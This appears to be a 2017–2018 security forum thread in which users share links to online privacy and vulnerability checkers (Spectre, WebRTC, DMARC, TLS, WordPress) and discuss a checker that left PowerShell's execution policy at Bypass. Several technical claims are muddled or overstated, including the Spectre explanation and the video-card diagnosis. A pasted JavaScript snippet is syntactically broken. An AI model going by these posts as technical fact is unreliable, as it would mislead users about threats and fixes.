Post by: polonus on December 18, 2017, 11:12:06 PM
Checked here: https://www.detectadblock.com/

It said that I am allowing ads, good for me.

I have an anti-adblock-solution of sorts running under my Tampermonkey user-script extension,
called Anti-Adblock Killer | Reek and it does a great job for me.

When I meet an adblocker blocker I can choose to block their ads and visit the site via a webproxy anyway.

Else the risk of getting any (3rd party) mal-ad-code is too great a risk in my opinion to even considering lifting my adblocker.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on January 02, 2018, 05:17:48 PM
Test your browser against password manager leak:
https://senglehardt.com/demo/no_boundaries/loginmanager/
this as webtrackers follow internet-users via password managers.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 03, 2018, 12:09:24 AM
Tested IP here: https://www.perfect-privacy.com/check-ip/

Results OK for
Quote
HTTP metadata does not contain any suspicious information
HTTP_VIA   - empty -
HTTP_CLIENT_IP   - empty -
HTTP_CLIENT_IP (DNS)   - empty -
HTTP_FROM   - empty -
HTTP_X_REAL_IP   - empty -
HTTP_X_FORWARDED   - empty -
HTTP_X_FORWARDED_FOR   - empty -
Java disabled
Flash diabled
;)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 08, 2018, 09:59:21 PM
Check here your Spectre CPU vulnerability

http://xlab.tencent.com/special/spectre/spectre_check.html

Enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on January 08, 2018, 10:20:04 PM
Check here your Spectre CPU vulnerability

http://xlab.tencent.com/special/spectre/spectre_check.html

Enjoy, my friends, enjoy,

polonus

I had thought this would actually be a CPU check for vulnerability, as per the 'bold text.'

However, this would be browser check and not a CPU check.
Title: Re: Tests and other Media topics
Post by: polonus on January 08, 2018, 11:04:25 PM
Hi DavidR,

Probably you did not grasp the workings of the Spectre bug.
Explained in layman's terms, sort of going like this to get info out of a box (browser cache in this case, where it should not leave your system, they question the CPU cache and this could cheat on confidential info you don't wanna share, but your chip will anyways.

Above is a check how your browser is vulnerable about this pre-cache CPU info cheating bug thingie, without overhyping it.
So we have to see connections now are being more secure, encryption more solid etc. until a new range of new non-vulnerable chips come into production.

Your chip is cheating inside the browser, wherever. it should because it was a stupid way of enhancing the speed with pre-guessing to make it faster.  If they check say for G and get a fractional glimpse of G and then later the cache protection says Y, they still could have a good guess inside the CPU a fraction earlier it was indeed G they were after. Capito?

So it is definitely Spectre CPU related.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on January 08, 2018, 11:17:55 PM
Maybe browsers should come up with a cache flush button.

What your browser does not (re)collect, it cannot spread.

So guys and gals flush that browser cache.

Two more spectre tests: https://github.com/wearefriday/spectre tool
Info credits go to vgrigorik & nickdunn

Testing on Windows via a Powershell command, read:
https://www.bleepingcomputer.com/news/microsoft/how-to-check-and-update-windows-systems-for-the-meltdown-and-spectre-cpu-flaws/ info credits go out to Catalin Cimpanu

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on January 09, 2018, 12:12:02 AM
Hi DavidR,

Probably you did not grasp the workings of the Spectre bug.
Explained in layman's terms, sort of going like this to get info out of a box (browser cache in this case, where it should not leave your system, they question the CPU cache and this could cheat on confidential info you don't wanna share, but your chip will anyways.
<snip>
So it is definitely Spectre CPU related.

Damian

It is just that the bold headline is somewhat misleading when it only talks of CPU vulnerability but the test is only browser related.

So it was surprising when it is only checking your browser in isolation.  For instance if your CPU isn't vulnerable why check the browser.  On this win10 system with the latest firefox version 57.0.4 (64-bit), it reports the browser isn't vulnerable.

Though if I ran this test on my XP system with the ESR version of Firefox it may be different, but the major thing on my XP system is by all accounts my 'old not modern' CPU isn't vulnerable.
Title: Re: Tests and other Media topics
Post by: polonus on January 09, 2018, 12:54:11 AM
Firefox and Google browser already patched to this as with most patching this will be only in a software manner,
as the Intel hardware design flaw/hole can only be patched with a new secure upcoming production line,
and this will not be with us until 2020.

As we know the flaw can be again abused through javascript played out within very tiny tiny time frames.

As we both have known now for a long time, blocking javascript to run inside a browser,
is the best security measurement one could take under all circumstances and for all kind of threats.

Over to a completely other subject:

I am always on the look-out to combine non-likely related results to get at a better overall verdict, like
the malware presented from here: http://urlquery.net/report/0e68bab7-835a-4ca5-b9bb-2f075f1a6188
combined with results like here: http://sun-adv.com.dnstree.com/

Damian
Title: Re: Tests and other Media topics
Post by: polonus on January 10, 2018, 12:10:17 AM
Just like the new service from VT for registered users, this is also new:
https://urlscan.io/result/9b5e14d3-7ce4-49b0-a26f-b8adccb8046d/related/

Related from: https://urlscan.io/result/9b5e14d3-7ce4-49b0-a26f-b8adccb8046d/#summary

Just as it was discussed in the virus and worms makes it the more relevant on Webzilla abuse,
a Dutch hosting AS. Spamhaus just asked cloudproviders to give a bigger effort to fight off spam botnets.

Reported: https://www.spamhaus.org/news/article/772/spamhaus-botnet-threat-report-2017

We also have to do our bit as end users report botnet abuse on the Interwebs here and else-where.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on January 10, 2018, 04:57:30 PM
Check whether your Windows cpu is vulnerable to Meltdown and Spectre:

https://www.ashampoo.com/en/usd/pin/1304/security-software/spectre-meltdown-cpu-checker

polonus

Anyone found results for AMD E1 chips? Scan results may not materrialize...

D
Title: Re: Tests and other Media topics
Post by: bob3160 on January 10, 2018, 06:15:43 PM
Check whether your Windows cpu is vulnerable to Meltdown and Spectre:

https://www.ashampoo.com/en/usd/pin/1304/security-software/spectre-meltdown-cpu-checker (https://www.ashampoo.com/en/usd/pin/1304/security-software/spectre-meltdown-cpu-checker)

polonus
(https://screencast-o-matic.com/screenshots/u/Lh/1515604484704-22878.png)
A bit strange since this system is totally updated ???
Title: Re: Tests and other Media topics
Post by: polonus on January 10, 2018, 09:23:34 PM
Hi bob3160,

Probably has to do with not all vendors gave you the necessary firmware updates.
Reason probably is through your video-card that still is vulnerable to Spectre.

Spectre should be mitigated only via a firmware hardware update,
and these will be finally due in at the end of this month.

The real definite mitigation of the Intel debacle needs a new hardware chip and that may,
taking a bit of debugging and the necessary testing scheduled for another two years  ::)

So this means a lot of new laptops, computers, smartphones and all sort of IoT devices to buy,
or in need maintanance and a new "total recall" to speak with Schwartzenegger.

This Spectre/Meltdown debacle gonna cost us all.
The only laughing third party is commerce, they gonna get extra revenue big time.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 11, 2018, 01:30:26 PM
Those that tested with this tool be extra careful,
your settings may have been changed by the test tool.
  :o

Nota Bene!
The use of the Ashampoo Spectre Meltdown CPU Checker will result that in Windows PowerShell the ExecutionPolicy for CurrenttUser is being set as, and will remain set as "Bypass".
This while the standard setting should be "Undefined" or "Restricted" and not "Bypass".

To check your  PowerShell ExecutionPolicies and correct the settings,
open Windows PowerShell, through clicking right, Ëxecute as Admininstrator".

Inside Windows PowerShell, give in the following command:
Get-ExecutionPolicy -list

When for  CurrentUser weergegeven is listed that ExecutionPolicy has been set as "Bypass",
restore the default settings by giving in the followingt command:
Set-ExecutionPolicy -ExecutionPolicy Default -Scope CurrentUser

Or just not set this for CurrentUser but for all Scopes at a time:
Set-ExecutionPolicy -ExecutionPolicy Default

Documentated here:
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-5.1

Info credits go to itman, re:
https://www.wilderssecurity.com/threads/kernel-memory-leaking-intel-processor-design-flaw-forces-linux-windows-redesign.399338/page-16#post-2730623
https://www.wilderssecurity.com/threads/kernel-memory-leaking-intel-processor-design-flaw-forces-linux-windows-redesign.399338/page-16#post-2730646

Info credits for the above message go to Spiff (security dot nl).

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on January 11, 2018, 02:20:27 PM
(https://screencast-o-matic.com/screenshots/u/Lh/1515676586563-50493.png)

(https://screencast-o-matic.com/screenshots/u/Lh/1515676718361-73246.png)
After a reboot, I'll check to see if I have updates waiting for me.
Title: Re: Tests and other Media topics
Post by: polonus on January 11, 2018, 02:48:45 PM
Another way could be to set it to

Quote
MachinePolicy        Undefined
UserPolicy             Undefined
Process                 Undefined
CurrentUser          Undefined
LocalMachine        Undefined

pol
Title: Re: Tests and other Media topics
Post by: polonus on January 11, 2018, 02:56:54 PM
Adopt Chromium OS settings:

Quote
Chrome Site Isolation -> https://support.google.com/chrome/answer/7623121

If you are using Google Chrome or Chromium, please follow the steps below:

Type chrome://flags in the address bar and press Enter.
Scroll down the page and find “Strict site isolation” and press the Enable button.
Restart the Chrome browser.
https://www.chromium.org/Home/chromium-security/ssca

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 11, 2018, 03:10:37 PM
Checking on domain configuration and certificate installed...

For this PHISHING domain: -guru.cr

Re: https://toolbar.netcraft.com/site_report?url=guru.cr
Re: https://cryptoreport.websecurity.symantec.com/checker/
Results:
Quote
Certificate is installed correctly
Common name:
 guru.cr
SAN:
 guru.cr, cpanel.guru.cr, gurucr.com, mail.guru.cr, mail.gurucr.com, webdisk.guru.cr, webmail.guru.cr, whm.guru.cr, www.guru.cr, www.gurucr.com
Valid from:
 2017-Dec-29 00:00:00 GMT
Valid to:
 2018-Mar-29 23:59:59 GMT
Certificate status:
 Valid
Revocation check method:
 OCSP
Organization:
 
Organizational unit:
 
City/locality:
 
State/province:
 
Country:
 
Certificate Transparency:
 Not embedded in certificate
Serial number:
 f549d40077ef9ca14b21b7a669b991f1
Algorithm type:
 SHA256withRSA
Key size:
 2048
Certificate chainShow details
COMODO RSA Certification AuthorityIntermediate certificate
cPanel, Inc. Certification AuthorityIntermediate certificate
guru.crTested certificate
Server configuration
Host name:
 198.23.60.248
Server type:
 Apache
IP address:
 198.23.60.248
Port number:
 443
Protocols enabled:
TLS1.2
TLS1.1
TLS1.0
Protocols not enabled:
SSLv3
SSLv2
Secure Renegotiation:
 Enabled
Downgrade attack prevention:
 Enabled
Next Protocol Negotiation:
 Not Enabled
Session resumption (caching):
 Enabled
Session resumption (tickets):
 Enabled
Strict Transport Security (HSTS):
 Not Enabled
SSL/TLS compression:
 Not Enabled
Heartbeat (extension):
 Enabled
RC4:
 Not Enabled
OCSP stapling:
 Not Enabled

Vulnerabilities checked:
Heartbleed
Poodle (TLS)
Poodle (SSLv3)
FREAK
BEAST
CRIME
Cipher suites enabled:
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000A)
TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x0016)
TLS_RSA_WITH_AES_128_CBC_SHA (0x002F)
TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033)
TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)
TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)
TLS_RSA_WITH_AES_128_CBC_SHA256 (0x003C)
TLS_RSA_WITH_AES_256_CBC_SHA256 (0x003D)
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (0x0067)
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (0x006B)
TLS_RSA_WITH_AES_128_GCM_SHA256 (0x009C)
TLS_RSA_WITH_AES_256_GCM_SHA384 (0x009D)
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (0x009E)
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (0x009F)
TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (0xC012)
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xC013)
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xC014)
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (0xC027)
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (0xC028)
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xC02F)
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (0xC030)

11 issues here: https://mxtoolbox.com/domain/guru.cr/

F-grade status and recommendation and further scans: https://observatory.mozilla.org/analyze.html?host=guru.cr

Flagged: http://urlquery.net/report/80affa33-f2af-40e6-b824-6888dd8fb762

Also consider: https://urlscan.io/domain/guru.cr  -> -> https://urlscan.io/result/32d9da5e-c460-4f4e-8857-0f10341263f2/#summary

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: RejZoR on January 12, 2018, 09:31:58 AM
Thx for the headsup Polonus! That's a bit stupid on the Ashampoo's side...
Title: Re: Tests and other Media topics
Post by: RejZoR on January 12, 2018, 10:02:45 AM
Another way could be to set it to

Quote
MachinePolicy        Undefined
UserPolicy             Undefined
Process                 Undefined
CurrentUser          Undefined
LocalMachine        Undefined

pol

How do you set it to "Undefined"? Using "Default" sets it to "Restricted"...
Title: Re: Tests and other Media topics
Post by: DavidR on January 12, 2018, 11:16:00 AM
Another way could be to set it to

Quote
MachinePolicy        Undefined
UserPolicy             Undefined
Process                 Undefined
CurrentUser          Undefined
LocalMachine        Undefined

pol

How do you set it to "Undefined"? Using "Default" sets it to "Restricted"...

If you check bob3160's earlier post, it has some images and there is a link in one of the images that may help. 
https://forum.avast.com/index.php?topic=129271.msg1441045#msg1441045

I don't know if you have tried the ? after the command to see if it gives much help.
Title: Re: Tests and other Media topics
Post by: polonus on January 12, 2018, 03:10:57 PM
Hi DavidR,

A better way to check is: https://www.howtogeek.com/338801/how-to-check-if-your-pc-is-protected-against-meltdown-and-spectre/

undefined in this sense equals restricted - from this article
Quote
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-5.1
names under "Windows PowerShell Execution Policies", "Undefined",
If the execution policy in all scopes is Undefined, the effective execution policy is Restricted, which is the default execution policy.

So I am fine, on AMD I am also not vulnerable to meltdown where Intel users are  ;) ;D

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on January 12, 2018, 05:28:59 PM
Hi DavidR,

A better way to check is: https://www.howtogeek.com/338801/how-to-check-if-your-pc-is-protected-against-meltdown-and-spectre/

undefined in this sense equals restricted - from this article
Quote
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-5.1
names under "Windows PowerShell Execution Policies", "Undefined",
If the execution policy in all scopes is Undefined, the effective execution policy is Restricted, which is the default execution policy.

So I am fine, on AMD I am also not vulnerable to meltdown where Intel users are  ;) ;D

polonus

My post was a direct response to RejZoR, he may well find this useful.

I'm on an old Core2Duo and as far as I can tell that too isn't vulnerable. 

The only thing you are vulnerable to is MS screwing up your system with a windows update for AMD chips, but they have now pulled windows updates for AMD chips.
Title: Re: Tests and other Media topics
Post by: polonus on February 05, 2018, 01:03:39 PM
Full list of Symantec-dertificates that will become untrusted:
https://raw.githubusercontent.com/arkadiyt/symantec-certificate-checker/master/bad_hosts.txt

Read: https://arkadiyt.com/2018/02/04/quantifying-untrusted-symantec-certificates/

Checked with Symantec's: https://observatory.mozilla.org/analyze.html?host=easyredmine.com#tls
Quote
SSL certificate is not installed. Click here to get a certificate.

Many systems are configured with firewalls that block SSH access. To successfully scan with the SSH Observatory,
access must be granted to Mozilla's scanning system.
But a A- status here? -> https://www.ssllabs.com/ssltest/analyze?d=easyredmine.com
DNS CAA No - Chain issues - 5 DNS issues -> https://mxtoolbox.com/domain/www.easyredmine.com/

Also consider info here: https://toolbar.netcraft.com/site_report?url=%09https%3A%2F%2Fwww.easyredmine.com

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 09, 2018, 12:11:31 AM
From June 2018 henceon Google Chrome browser will start to label all http websites as insecure,
this in order to come to a https only Internet, which will also better protect connections for their core business
and all data that they will be sending to their chocolate factory (including your private data) via non-public CDN,
so who will check their tracking and profiling and to whom they stand responsible?

To better be able to check your https website functionality and code use:
https://developers.google.com/web/tools/chrome-devtools/#open

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 11, 2018, 06:17:46 PM
Checking backupspider.com.html on Zonemaster creates critical errors, this scan however is fine:
https://zonemaster.iis.se/?resultid=a9edfa238f0b5f9b

Results supported by these results: https://intodns.com/backupspider.com

3 issues here: https://mxtoolbox.com/domain/backupspider.com/

Risk rating 1 red out of 10: https://toolbar.netcraft.com/site_report?url=backupspider.com

polonus (volunteer website security analyst & website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 20, 2018, 08:31:30 PM
One knows polonus checks for retirable jquery libraries, including node js,  using online retire js scanner,
There is also a way to check node.js for insecurety: snyk open source .
One can do a test for azure (azure@2.2.1-preview) and test e.g. "tunnel agent" in for instance Brave browser on android and we will get 9 issues, "do not use callbacks"  for one.
Install -> npm install -g snyk d -/projects/myproj/
snyk test

Enjoy,
polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 24, 2018, 11:15:28 PM
Hi security minded friends,

Polonus was away for the week to central Poland, temp now minus 8 Celsius.

While not much online here last week on these here forums,
polonus is as always continuously on the look-out for script-security improvement of any sort.

I and a younger IT friend of mine stumbled onto this super script from the renowed resource engineer
& open source security researcher, zx2c4, from Paris, France.

His is the innovative secure.js script. To enjpoy this script, go to this link,
and see this javascript to prevent HTTPS leaks:  https://git.zx2c4.com/secure.js/tree/secure.js

As we find in his to do list inside the code there is still some work to be done on detecting async scripts,
and through going over StackOverflow's solutions,  and thnx to Cookie_Monster there, we stumbled upon:

Code: [Select]
document.querySelectorAll ( 'script') ;
< script async src= "jquery.js"onload = "jqueryloaded ( )"
var script = document.  create Element ("script") ; script.src = jquery.js' ;
script.onload = jqueryloaded ;
document.body.appendChild(script) ;
head.load ("jQuery.js)" ,
function ( ) {
console.log
}) ; 
 

Could there be a possibility secure.js could be adopted & enhanced in such a way?
Still waiting from a response from Jason Donenfeld (aka zx2c4) accordingly,

polonus (volunteer website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on February 27, 2018, 05:43:09 PM

Get a universally unique identifier to protect your geekie code
from here: http://onlineuuidgenerator.com/  (also time-based version).

Unique identifiers can protect you and also can give you away when you violate online laws.

Think of Verizon's Precison ID? (re: http://www2.ca3.uscourts.gov/opinarch/163588p.pdf )
and re: https://readwrite.com/2015/01/31/verizon-tracking-perma-cookies-supercookies-uidh-precisionid-opt-out/
also perma-cookies while on tor and afterwards can identify you.

Tor will not anonymize you, in combination with tails also not fully anonymize ye, recorded is the size of your browser window open for instance, and other unique identifiers like typing habits/speed/anomalities, websites visited etc.

Using tails in combination with a VM is a bad idea, it can unveil your OS identification. Using tot and tails and a vpn a la default is always a bad idea for hackers and cybercriminals alike. You get caught period.

Also be aware of correlation attacks, targeted malware injection, and time-based attacks.Also never share privacy related data online or break your online habits. These mistakes has caused many a perpetrator quite some jailtime.
So better do not do the crime, if you cannot do the time.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 05, 2018, 06:03:30 PM
A fine AI-driven PHISHing-IP checker:
(example IP): https://checkphish.ai/ip/94.23.220.38

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 05, 2018, 06:25:58 PM
An example of what we can detect starting to use this service:
https://checkphish.ai/ip/94.23.220.38  and then checked: https://checkphish.ai/domain/poufmarocain.com
and then https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=poufmarocain.com&ref_sel=GSP2&ua_sel=ff&fs=1
and also two detections here: https://retire.insecurity.today/#!/scan/8daed221f8bde319f1f93ab73c4d2578663ae7ee4fdd039823c1c35b578c47bf
moreover this:
Quote
poufmarocain.com/js/jquery/jquery-migrate-1.2.1.min.js benign
     info: [decodingLevel=0] found JavaScript
     error: undefined variable jQuery
     error: undefined function e
Also http://www.domxssscanner.com/scan?url=https%3A%2F%2Fpoufmarocain.com%2F
leading us here: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=www.comservice-online.de%2Findex.php%3Fmod%3Dusers%26action%3Dview%26id%3D121198%2F&ref_sel=GSP2&ua_sel=ff&fs=1

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 06, 2018, 01:52:36 PM
To keep everything tested and secure: http://seclist.us/category/security-tools

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 16, 2018, 02:15:55 PM
Are you out on a spoofable AS?
Test and help fight against InfoSpoofing:

https://www.infospoofing.com/

polonus

Info credits also: https://www.caida.org/projects/spoofer/
Title: Re: Tests and other Media topics
Post by: polonus on March 17, 2018, 01:25:13 PM
Important as an anti-spoof protection for sub-domains etc is to have a dmarc record,

Read background info: https://fraudwatchinternational.com/expert-explanations/dmarc-protecting-domains/

test here (free trial 14 days): https://dmarcian.com/dmarc-inspector/rug.nl
Or check here: https://mxtoolbox.com/dmarc.aspx

Free check tool: https://www.dmarcanalyzer.com/dmarc/dmarc-record-check/

Example - -https://app.dmarcanalyzer.com/dns/dmarc_validator?domain=yahoo.com&g-recaptcha-response=03ANcjospioYln4U73s09y5mmYq3HTT0IWNbAdz78uQ0oIrCBEQ2WO1BHfSQIpFpdHxyVPGyKpgSu1o32MqXIsZ4oqWbW_bcRGuKmcB_UFpvR4IDgCKaadO87tU42mQhzFKqGKQBcP3dy4VEUDC-HXLUDvN23gnyP5twFdOJbZ9I41IrorzPm38kI4_wJlWXE9_3pwTwy9qLM8x1eg-P8RBrSb_jyYgvhB-Y0RNB1_dio1RWg39d-HUpS7VGyAcewNwVvUXQ-RuzlYSF0cRLJvwBEv6ED2J1dKlozAWbRNXqx5G6fvY-vj8SMe9g8DeMjxA914b0gQ5D5S&_token=d6VBx3OrOvqoZE8tUwj5AAh7Id6u7tlneivRvAIH

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 30, 2018, 08:45:30 PM
Proxies and VPN's may leak your IP-address through WebRTC.
This can be done via so-called stun-server logs.


Read about it here: https://voidsec.com/vpn-leak/
Protect against it with this extension: https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia

Check your vulnerability: http://ip.voidsec.com/

Quote
How to disable WebRTC in Firefox?

In short: Set "media.peerconnection.enabled" to "false" in "about:config".

Explained:

Enter "about:config" in the firefox address bar and press enter.
Press the button "I'll be careful, I promise!"
Search for "media.peerconnection.enabled"
Double click the entry, the column "Value" should now be "false"
Done. Do the WebRTC leak test again.

If you want to make sure every single WebRTC related setting is really disabled change these settings:

media.peerconnection.turn.disable = true
media.peerconnection.use_document_iceservers = false
media.peerconnection.video.enabled = false
media.peerconnection.identity.timeout = 1

Now you can be 100% sure WebRTC is disabled.
Quiote source: : https://www.privacytools.io/#webrtc

You will be astounded when you check here: https://www.dnsleaktest.com/
and for further tests: https://www.grc.com/dns/dns.htm

No more leaks via a IPVanish with this extension:
https://addons.mozilla.org/nl/firefox/addon/happy-bonobo-disable-webrtc/

In privacy badger you can set prevent WebRTC to leak the internal IP address.
This could cause some slowness on Google Hangout.

Palemoon browser blocks this leaking as per default.

Info credits go to posters here: -https://www.security.nl/posting/555923

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 05, 2018, 03:07:00 PM
In the light of re-appearing security issues with websites with PHP driven Word Press CMS
(CMS short for Content Management Software).

Start to scan for a really quick and dirty here: http://hackertarget.com/wordpress-security-scan/

Also at: https://sitecheck.sucuri.net/
and https://www.quttera.com scans.

Furthermore for retirable jQuery libraries scan here: https://retire.insecurity.today/#

Also: https://observatory.mozilla.org/?
Together with a scan here: https://cryptoreport.websecurity.symantec.com/checker/en
Furthermore scan at: http://www.domxssscanner.com/

All scans are just meant for obtain benevolent research info.
Never use any info so gained against a certain AS, domain, IP range or IP etc.

For a json and api info scan: https://urlscan.io/domain

More scan suggestions via : https://geekflare.com/online-scan-website-security-vulnerabilities/

Interesting results may also be obtrained here via a scan here:
https://www.eff.org/https-everywhere/atlas/

Also via http://rips-scanner.sourceforge.net/ 
and
https://app.upguard.com/webscan#/

Enjoy my friends, enjoy.  Info credits luntrus (@security dot nl)

With questions or issues come to the virus and worms section of these avast forums,

polonus (volunteer website security analyst and website error hunter)
Title: Re: Tests and other Media topics
Post by: bob3160 on April 05, 2018, 04:06:09 PM
Thank You. :)
(https://screencast-o-matic.com/screenshots/u/Lh/1522937124978-50695.png)
Title: Re: Tests and other Media topics
Post by: polonus on April 07, 2018, 02:49:18 PM
This is a POC - DO NOT use it for a production environment  Info credits goes to thecker at Github Today

Checking this POC code against facebook's proxygen-bolt -> https://github.com/lhecker/libnodecc
Do not use libnodecc in a developer's production environment, just for research experiments only.
See: https://urlscan.io/result/3b26405e-cc14-49fb-ba92-e2e2f8be0368/jsonview/
and https://urlquery.net/report/c85aceb0-5456-4363-ad7f-b9bb3e960636
proxygen-bolt unrecognized despite returning data
There always should be room for PHP (in)security testing: Security Checks for -static.xx.fbcdn.net
Verdict of insecurity:
(2) Susceptible to man-in-the-middle attacks
HSTS header does not contain includeSubDomains
HSTS header not prepared for preload list inclusion
Vulnerable to cross-site attacks
HttpOnly cookies not used

error to go onto
Quote
-static.xx.fbcdn.net/rsrc.php/v3iCvN4/yt/l/DE/iNEySX6agJT.js benign
     info: [decodingLevel=0] found JavaScript
     error: undefined variable __d
     error: undefined function __d
nested undefined variable error, when you try to grab, but you do not see what is run...(pol).

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 10, 2018, 04:49:27 PM
Babel, a strict VM driven javascript compiler on the client (browser) to tight-test javascript security!

What we tested? Well javascript taken from this scan: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fyandex.ru

Tested against babel here: https://babeljs.io/repl#?babili=false&browsers=&build=&builtIns=false&code_lz=BQMwrgdgxgLglgewsA5gGgBZoDIEoDe408SABAG7ACGaARmlAQE4CmMYTEpRsiyBMJgE98rdp1JUAdFQAOsgDZDgMDHA

Do not think out of the box, think strict and exact. Go to the next phase with Rust and Babel.

Another check of this code: -mc.yandex.ru/metrika/watch.js benign
DOM-XSS vuln.
Number of sources found: 77
Number of sinks found: 14

For instance
Quote
repl: Unexpected token, expected ; (1:17)
> 1 | ["\x3c/form\x3e"]);h.innerHTML=k.join("")
    |                  ^ 

Enjoy, my research developer friends, enjoy,

Example
Quote
import codeFrame from 'babel-code-frame';
 
const rawLines = `class Foo {
  constructor()
}`;
const lineNumber = 2;
const colNumber = 16;
 
const result = codeFrame(rawLines, lineNumber, colNumber, { /* options */ });
 
console.log(result);
var jsTokens = require("js-tokens").default
 
var jsString = "var foo=opts.foo;\n..."
 
jsString.match(jsTokens)
// ["var", " ", "foo", "=", "opts", ".", "foo", ";", "\n", ...]
import {matchToToken} from "js-tokens"
// or:
var g = 9.82
var number = bar / 2/g


polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 03, 2018, 04:35:06 PM
Checking the privacy status of a certain website to a certain degree (cookies, advice, privacy, mozilla recommendations):

Re: https://webcookies.org/scan/15218489
Re: https://www.scamadviser.com/check-website/borneonews.co.id
Re: https://observatory.mozilla.org/analyze/www.borneonews.co.id
Re: https://privacyscore.org/site/96307/
Quote
This website is secured
100% of the trackers on this site are helping protect you from NSA snooping. Why not thank borneonews.co.id for being secure?

 All trackers
At least 7 third parties know you are on this webpage.

 -Google
 -www.borneonews.co.id
 -Facebook
 -Google
-www.google-analytics.com Google
 -api.borneonews.co.id
 -Google

 Info Tracker SSL extension report for wXw.borneonews.co.id

Also consider (1 red out of 10 netcraft risk given):
https://toolbar.netcraft.com/site_report?url=https%3A%2F%2Fwww.borneonews.co.id%2F

and insecurity reported here: https://app.upguard.com/webscan#/borneonews.co.id

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 06, 2018, 03:07:39 PM
L.S.

DNS Record Viewer and another fine collection of handy dandy tools here:

http://dns-record-viewer.online-domain-tools.com/

Good to be used in combination with my Shodan extension in the browser - example:
https://www.shodan.io/host/52.2.58.67  -> http://ec2-52-2-58-67.compute-1.amazonaws.com/
PTR - pdns1.ultradns.net  x4.amazonaws.org  x2.amazonaws.com  x1.amazonaws.com  x3.amazonaws.org

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 07, 2018, 11:42:47 PM
For Word Press website admins and maintanance:

Looking for retirable jQuery libraries: https://retire.insecurity.today/#

Scan for Word Press issues (a quick and dirty) scan at https://hackertarget.com/wordpress-security-scan/

For developers in the audience:
Quote
With Word Press plug-ins there is a possibility to get errors wih a certain plug-in that overwrites,
Press F 12 and inspect in the browser console what file causes this.
First thing to do now is to de-activate the plug-in, and a second solution is to remove the code,
but in that case you have to know your javascript a bit.


Quote info credits and thanks for the instruction goes out to Jasminder Pal Singh
,
who instructed this method to me via an online video.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2018, 12:35:42 AM
Going over an error after a PTR request for 165.38.101.151.in-addr.arpa , it said I got a name error.

After reading on how to setup Reverse DNS & PTR records, I stumbled on this nice online interface website:

https://www.digwebinterface.com/?hostnames=165.38.101.151.in-addr.arpa&type=Reverse&ns=resolver&useresolver=8.8.4.4&nameservers=

Not much to go by here: https://toolbar.netcraft.com/site_report?url=165.38.101.151.in-addr.arpa

Above link for IT specialists and researchers only.

We also checked it here and found out why it failed: DNSsy Report Results
Results for 165.38.101.151.in-addr.arpa

Test   Results   Status
Checking domain format:   Hostname looks good.   Pass
Checking for parent nameservers:   Found 6 parent nameservers.   Pass
Checking for parent glue:   Found glue from root nameservers to parent nameservers.   Info
NS records at parent nameserver:   Your NS records at your parent nameserver are:
 
 
Provided by e.in-addr-servers.arpa -> pri.authdns.ripe.net   Info
Nameservers listed at parent:   No nameservers found at parent nameserver.   Fail

Another tool for web admins in this line: http://www.subnet-calculator.com/cidr.php
and for dns: https://www.dnscolos.com/dnsreport.php


Enjoy, my good friends, enjoy,

polonus (volunteer website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2018, 02:55:25 PM
More on the dig web interface -
